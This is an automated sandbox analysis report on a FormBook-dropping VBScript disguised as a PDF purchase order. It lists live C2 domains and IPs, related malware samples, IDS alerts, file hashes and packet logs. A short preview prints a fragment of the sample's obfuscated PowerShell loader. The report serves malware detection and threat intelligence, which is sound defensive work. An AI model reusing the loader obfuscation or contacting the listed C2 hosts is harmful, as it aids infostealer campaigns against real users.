                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        101.35.209.183
                                                                                        		www.yc791022.asiaChina
                                                                                        		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                        161.97.142.144
                                                                                        		www.030002350.xyzUnited States
                                                                                        		51167CONTABODEtrue
                                                                                        156.232.181.155
                                                                                        		www.5tuohbpzyj9.buzzSeychelles
                                                                                        		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                                        199.59.243.227
                                                                                        		www.bcg.servicesUnited States
                                                                                        		395082BODIS-NJUStrue
                                                                                        203.161.46.205
                                                                                        		www.nimil.infoMalaysia
                                                                                        		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                        103.20.102.62
                                                                                        		unknownunknown
                                                                                        		45415VASAICABLEPVTLTD-AS-INVasaiCablePvtLtdINtrue
                                                                                        185.199.111.133
                                                                                        		raw.githubusercontent.comNetherlands
                                                                                        		54113FASTLYUSfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1555634
                                                                                        Start date and time:2024-11-14 08:14:32 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 8m 32s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:10
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:2
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:PO-DC13112024_pdf.vbs
                                                                                        Detection:MAL
                                                                                        Classification:mal100.spre.troj.spyw.expl.evad.winVBS@12/8@11/7
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 60%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 95%
                                                                                        • Number of executed functions: 43
                                                                                        • Number of non-executed functions: 312
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .vbs

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target WKOyCvoOlM.exe, PID 6008 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 1276 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        02:15:32API Interceptor45x Sleep call for process: powershell.exe modified
                                                                                        02:16:43API Interceptor2049124x Sleep call for process: where.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        161.97.142.144Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030003452.xyz/7nfi/
                                                                                        AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030002059.xyz/er88/
                                                                                        ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030003582.xyz/7zm7/
                                                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030002128.xyz/knx2/
                                                                                        56ck70s0BI.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030002832.xyz/o2wj/
                                                                                        H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030002832.xyz/l9k5/
                                                                                        p4rsJEIb7k.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030002832.xyz/o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8
                                                                                        r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030002304.xyz/jkxr/
                                                                                        COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030002059.xyz/4h9e/
                                                                                        Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.030002107.xyz/fnq1/
                                                                                        199.59.243.227statement of accounts.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.vnxoso88.art/d26j/
                                                                                        Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.ebook.farm/rzaq/?mRu=S7FCB2U3I5+MEOix97haLm8n4ZiU5s+sYyIa9Io4LXSLJStcMtKrD203LPev0YXMiZ/cleh4jZ/UsKrDR5eop/VU9oI7TN7VO3RaOL7GPdXsiE9kkN1XODc=&UJ=7H1XM
                                                                                        RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.vnxoso88.art/d26j/
                                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.vnxoso88.art/sciu/
                                                                                        8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • ww25.lyxynyx.com/login.php?subid1=20241112-0512-3242-8891-570009ea3cb2
                                                                                        7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • vojyqem.com/login.php
                                                                                        UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • vojyqem.com/login.php
                                                                                        1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • ww25.lyxynyx.com/login.php?subid1=20241112-0450-16f3-ae99-53051689f189
                                                                                        arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • vojyqem.com/login.php
                                                                                        Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • vojyqem.com/login.php

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        raw.githubusercontent.comc39-EmprisaMaldoc.rtfGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.110.133
                                                                                        dens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                                                                                        • 185.199.108.133
                                                                                        Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                                        • 185.199.109.133
                                                                                        main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                                                        • 185.199.109.133
                                                                                        crss.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        bG2aSZYhDR.batGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.109.133
                                                                                        https://thrifty-wombat-mjszmd.mystrikingly.com/Get hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        scripttodo.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        scripttodo (3).ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        4YgQ2xN41W.lnkGet hashmaliciousRDPWrap Tool, DucktailBrowse
                                                                                        • 185.199.110.133
                                                                                        b1-3-r111.kunlundns.top3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                                        • 43.155.76.124
                                                                                        COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                        • 43.155.76.124
                                                                                        QUOTE2342534.exeGet hashmaliciousFormBookBrowse
                                                                                        • 129.226.56.200
                                                                                        COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exeGet hashmaliciousFormBookBrowse
                                                                                        • 129.226.56.200
                                                                                        Re property pdf.exeGet hashmaliciousFormBookBrowse
                                                                                        • 129.226.56.200

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        DXTL-HKDXTLTseungKwanOServiceHKnK1cgEhvAP.exeGet hashmaliciousUnknownBrowse
                                                                                        • 154.93.171.2
                                                                                        8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • 154.85.183.50
                                                                                        7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • 154.85.183.50
                                                                                        UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • 154.85.183.50
                                                                                        1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • 154.85.183.50
                                                                                        arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • 154.85.183.50
                                                                                        Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • 154.85.183.50
                                                                                        WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • 154.85.183.50
                                                                                        Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • 154.85.183.50
                                                                                        uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                        • 154.85.183.50
                                                                                        TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNPlay_VM-Now(Jwright)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 170.106.97.195
                                                                                        https://carrier.businessappdevs.com/Baa9NGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 170.106.97.195
                                                                                        amen.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                        • 170.106.78.108
                                                                                        sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                        • 119.28.5.200
                                                                                        yakuza.mips.elfGet hashmaliciousUnknownBrowse
                                                                                        • 162.62.204.200
                                                                                        sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                        • 170.106.78.106
                                                                                        https://app.smartsheet.com/b/form/d72b00b027df4e38a9b052ac176790d8Get hashmaliciousUnknownBrowse
                                                                                        • 49.51.77.119
                                                                                        8WdO7I87E1.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 119.28.133.90
                                                                                        nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 162.62.164.141
                                                                                        https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                        • 162.62.150.176
                                                                                        CONTABODEhttps://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                        • 207.180.225.113
                                                                                        Ref#2073306.vbeGet hashmaliciousMicroClipBrowse
                                                                                        • 144.91.79.54
                                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                        • 161.97.142.144
                                                                                        75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                                        • 5.189.178.202
                                                                                        SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 144.91.79.54
                                                                                        Ref#130709.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 144.91.79.54
                                                                                        AWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                        • 161.97.142.144
                                                                                        ByuoedHi2e.exeGet hashmaliciousFormBookBrowse
                                                                                        • 161.97.142.144
                                                                                        https://eu2.contabostorage.com/0f057bf4d91340d3ae18d5f31372fa7e:caldev/doc.html#dloplcemeteryoversight-labor@maryland.govGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 173.249.62.84
                                                                                        SecuriteInfo.com.Variant.Lazy.609195.22669.13746.dllGet hashmaliciousUnknownBrowse
                                                                                        • 161.97.144.222

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eSWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 185.199.111.133
                                                                                        Product list.scr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        MT350.scr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        Product list.scr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        MT350.scr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.199.111.133
                                                                                        Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 185.199.111.133
                                                                                        Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                        • 185.199.111.133
                                                                                        01. MT JS JIANGYIN Ship Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 185.199.111.133
                                                                                        ESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 185.199.111.133
                                                                                        KKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        • 185.199.111.133

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):1.1628158735648508
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:NlllulF7///h:NllU
                                                                                        MD5:34C16D1FA50B565A72B382C978CB2D56
                                                                                        SHA1:6502B5517917B40F8E25CCB08620F21E79D15704
                                                                                        SHA-256:612F4AE0F96FA0FEAB88126BFC524CA8D996602FE7EB6D476B91E0F17B852D41
                                                                                        SHA-512:4E8B7DA62F407579C261F9C9942A643B3DF6E7BD10EA736AC4B972C89F3C6E516E391420FE0992799F542945C6E2651E155C10356256C020D68B5A3C153EDDAE
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:@...e................................................@..........

                                                                                        C:\Users\user\AppData\Local\Temp\356hF-43

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\where.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                        Category:dropped
                                                                                        Size (bytes):196608
                                                                                        Entropy (8bit):1.121297215059106
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1d2z0d0.hpl.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fe5ybhyo.dcf.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hrn1x51k.rra.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qflcgbek.rhl.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0evjsb1.vc2.psm1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbgbn23g.bpl.ps1

                                                                                        Download File
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:ASCII text, with CRLF line terminators
                                                                                        Entropy (8bit):5.452694118869561
                                                                                        TrID:
                                                                                        • Visual Basic Script (13500/0) 100.00%
                                                                                        File name:PO-DC13112024_pdf.vbs
                                                                                        File size:13'902 bytes
                                                                                        MD5:07213aa47f52b96d0e8aa463a384bcf9
                                                                                        SHA1:d14f3d9f87a233f21a6d3e9a4cffeaba0bef144b
                                                                                        SHA256:069cf757c1829b0ceb918585fca5765b259546b12eb729b1d44b956effa3f290
                                                                                        SHA512:4e69763dcc9abee6841887cefb2f6fc188004a274b590e3ad2931b763f1a34255c5d74b7847a8d0279f2415f87066900c861ed3fe96b5d8a1e5de6ebb64dacba
                                                                                        SSDEEP:192:SNu8rDyH0yTD2lAgHiLM00oL3/4cHlaEcixOF9aBMDxpnO/966KG:M+TTwrHv0n3tF/xcGMFpW66X
                                                                                        TLSH:08521E026BB0CBF03D6FAB68A31726155910032DA8356ECE48F6C0EC2DBE4E56F7559D
                                                                                        File Content Preview: 'g..hdfkprhFpmc = rRegisggfgtaaeeadkggns2211 & ""..Call Ugsfisging("$co" & "digo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E")..Call Ugsfisging("0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bw")..Public Const npfdgAfjg = 9..'gjmiSprc

                                                                                        File Icon

                                                                                        Icon Hash:68d69b8f86ab9a86

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-14T08:15:37.553182+01002047750ET MALWARE Base64 Encoded MZ In Image1103.20.102.6280192.168.2.549704TCP
                                                                                        2024-11-14T08:15:37.556209+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21103.20.102.6280192.168.2.549704TCP
                                                                                        2024-11-14T08:15:41.182915+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1185.199.111.133443192.168.2.549705TCP
                                                                                        2024-11-14T08:15:50.576994+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549732TCP
                                                                                        2024-11-14T08:16:13.926913+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.563373TCP
                                                                                        2024-11-14T08:16:15.332037+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.563381TCP
                                                                                        2024-11-14T08:16:22.358617+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.563422199.59.243.22780TCP
                                                                                        2024-11-14T08:16:22.358617+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563422199.59.243.22780TCP
                                                                                        2024-11-14T08:16:47.405053+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563487156.232.181.15580TCP
                                                                                        2024-11-14T08:16:49.952180+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563488156.232.181.15580TCP
                                                                                        2024-11-14T08:16:52.498929+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563489156.232.181.15580TCP
                                                                                        2024-11-14T08:16:54.529953+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.563490156.232.181.15580TCP
                                                                                        2024-11-14T08:16:54.529953+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563490156.232.181.15580TCP
                                                                                        2024-11-14T08:17:02.561483+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563491101.35.209.18380TCP
                                                                                        2024-11-14T08:17:04.592653+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563492101.35.209.18380TCP
                                                                                        2024-11-14T08:17:07.373936+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563493101.35.209.18380TCP
                                                                                        2024-11-14T08:17:09.686592+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.563494101.35.209.18380TCP
                                                                                        2024-11-14T08:17:09.686592+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563494101.35.209.18380TCP
                                                                                        2024-11-14T08:17:16.548482+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563495203.161.46.20580TCP
                                                                                        2024-11-14T08:17:19.096313+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563496203.161.46.20580TCP
                                                                                        2024-11-14T08:17:21.645493+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563497203.161.46.20580TCP
                                                                                        2024-11-14T08:17:24.177140+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.563498203.161.46.20580TCP
                                                                                        2024-11-14T08:17:24.177140+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563498203.161.46.20580TCP
                                                                                        2024-11-14T08:17:30.229642+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563499161.97.142.14480TCP
                                                                                        2024-11-14T08:17:32.780060+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563500161.97.142.14480TCP
                                                                                        2024-11-14T08:17:35.345872+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.563501161.97.142.14480TCP
                                                                                        2024-11-14T08:17:37.893093+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.563502161.97.142.14480TCP
                                                                                        2024-11-14T08:17:37.893093+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.563502161.97.142.14480TCP
                                                                                        2024-11-14T08:17:45.124379+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.56350343.155.76.12480TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 14, 2024 08:15:33.764847040 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:33.772584915 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:33.772713900 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:33.773324013 CET4970480192.168.2.5103.20.102.62
                                                                                        Nov 14, 2024 08:15:33.780827045 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:34.783651114 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:34.783708096 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:34.783725977 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:34.783761024 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:34.783778906 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:34.783807039 CET8049704103.20.102.62192.168.2.5
                                                                                        Nov 14, 2024 08:15:34.783813953 CET4970480192.168.2.5103.20.102.62
